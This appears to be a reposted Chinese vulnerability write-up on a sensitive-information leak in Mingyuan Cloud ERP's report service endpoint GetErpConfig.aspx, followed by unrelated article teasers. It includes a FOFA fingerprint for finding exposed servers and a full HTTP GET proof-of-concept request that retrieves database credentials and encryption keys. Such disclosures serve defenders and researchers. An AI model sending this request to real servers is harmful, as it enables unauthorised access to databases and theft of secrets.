明源云ERP报表服务GetErpConfig.aspx接口存在敏感信息泄露

devtools/2024/10/22 3:41:25/

一、漏洞简介

在访问 /service/Mysoft.Report.Web.Service.Base/GetErpConfig.aspx?erpKey=erp60 路径时,返回了包含敏感信息的响应。这些信息包括但不限于数据库连接字符串、用户名、密码、加密密钥等。这些敏感信息的暴露可能导致以下风险:数据库访问风险:攻击者可以利用数据库连接字符串中的用户名和密码直接访问数据库,从而获取或篡改敏感数据。加密风险:攻击者可以利用加密密钥解密或篡改加密数据,导致数据泄露或数据完整性受损。系统管理风险:攻击者可以利用管理员用户代码进行系统管理操作,进一步扩大攻击范围。

二、漏洞影响


三、网络测绘:

fofa:
body="报表服务已正常运行"

在这里插入图片描述

四、复现过程

前置条件

前台

首页

在这里插入图片描述

步骤 POC 1

数据包

GET /service/Mysoft.Report.Web.Service.Base/GetErpConfig.aspx?erpKey=erp60 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Connection: close

http://www.ppmy.cn/devtools/127725.html

相关文章

LeetCode 每周算法 9(动态规划)

LeetCode 每周算法 9(动态规划) 动态规划算法: class Solution { public: // 定义函数,输入n表示楼梯的总级数,输出爬到楼梯顶部的不同方式的数量 int climbStairs(int n) { // 如果楼梯只有一级,那么…

【环境配置教程】Maven下载安装和基本配置

文章目录 往期文章前言 本地安装及环境配置1. 准备工作2. Maven 下载与安装2.1 下载 Maven2.2 安装Maven 3. 配置环境变量3.1 配置说明3.2 配置步骤 4. 测试Maven安装5. Maven 设置文件配置5.1 本地仓库设置5.2 镜像配置 IDEA中配置maven参考资料 往期文章 【环境配置教程】MY…

Qt- JSONXML

1. JSON概述 JSON(JavaScript Object Notation, JS 对象简谱)是一种轻量级的数据交换格式。 JSON 采用 key-value 的结构来组织和管理数据。 JSON 支持的数据类型: 数值型、字符串、布尔值、数组、对象等 JSON 来源于 JavaScript JSON应用…

Linux系统基础-动静态库

个人主页:C忠实粉丝 欢迎 点赞👍 收藏✨ 留言✉ 加关注💓本文由 C忠实粉丝 原创 Linux系统基础-动态库和静态库 收录于专栏[Linux学习] 本专栏旨在分享学习Linux的一点学习笔记,欢迎大家在评论区交流讨论💌 目录 1. 动…

Vue 组件 view-shadcn-ui 2024.1.1 发布

Vue 组件 view-shadcn-ui 2024.1.1 发布 View Shadcn UI 是一个基于 Shadcn UI 和 Tailwind CSS 构建的组件库。 推荐一套为 Java 开发人员提供方便易用的 SDK 来与目前提供服务的的 Open AI 进行交互组件:https://github.com/devlive-community/openai-java-sdk 推…

面试官:`interrupted()` 和 `isInterrupted()` 你真的用懂了吗?

感谢Java面试教程的 Java面试题:interrupted和isInterrupted方法的区别 在Java中,interrupted() 和 isInterrupted() 是用于检查线程中断状态的方法,但它们之间有一些关键的区别。 方法类型: interrupted() 是一个静态方法&…

深度学习--CNN实现猫狗识别二分类(附带下载链接, 长期有效)

1. 代码实现(包含流程解释) 样本量: 8005 # # 1.导入数据集(加载图片)数据预处理# 进行图像增强, 通过对图像的旋转 ,缩放,剪切变换, 翻转, 平移等一系列操作来生成新样本, 进而增加样本容量, # 同时对图片数值进行归一化[0:1] from tensorflow.keras.preprocessing.image …

2018年计算机网络408真题解析

第一题: 解析:TCP/IP体系结构应用层常用协议及其相应的运输层协议 TCP协议是面向连接可靠数据传输服务,UDP无连接不可靠的数据传输服务,IP无连接不可靠的数据连接服务。 FTP协议,SMTP协议和HTTP协议使用TCP协议提供的面…